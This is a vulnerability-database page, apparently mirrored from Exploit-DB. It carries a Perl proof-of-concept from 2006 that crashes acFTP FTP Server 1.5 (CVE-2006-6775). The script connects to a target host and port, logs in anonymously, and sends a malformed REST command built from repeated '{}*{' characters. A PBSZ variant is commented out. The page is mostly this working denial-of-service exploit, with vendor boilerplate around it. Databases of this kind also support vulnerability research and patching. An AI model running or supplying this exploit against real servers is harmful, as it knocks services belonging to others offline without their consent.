Lucene search
+L

acFTP FTP Server 1.5 - 'REST/PBSZ' Remote Denial of Service

🗓️ 23 Dec 2006 00:00:00Reported by gbrType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

acFTP FTP Server 1.5 Denial of Service by REST/PBSZ comman

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-6775
27 Dec 200623:00
cve
cvelist
Cvelist
CVE-2006-6775
27 Dec 200623:00
cvelist
euvd
EUVD
EUVD-2006-6758
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-6775
27 Dec 200623:28
nvd
#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service       #
# author: gbr                                   #
# mail: gabrielquadros[at]hotmail.com           #
#################################################


use IO::Socket;

if(!defined($ARGV[0])) {
       print "Usage: $0 ip port\n";
       exit;
}

my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
                               PeerPort => $ARGV[1],
                               Proto    => 'tcp')
       or die "Could not open a socket: $!\n";

$sock->recv($buf, 1024);
$sock->send("USER anonymous\r\n");
$sock->recv($buf, 1024);
$sock->send("PASS anonymous\r\n");
$sock->recv($buf, 1024);
for($i=0; $i<10; $i++) {
       $data .= "{}*{";
}

$sock->send("REST $data\r\n");
# $sock->send("PBSZ $data\r\n");

print "Server exploited\n";

# milw0rm.com [2006-12-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2011 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
EPSS0.01893
32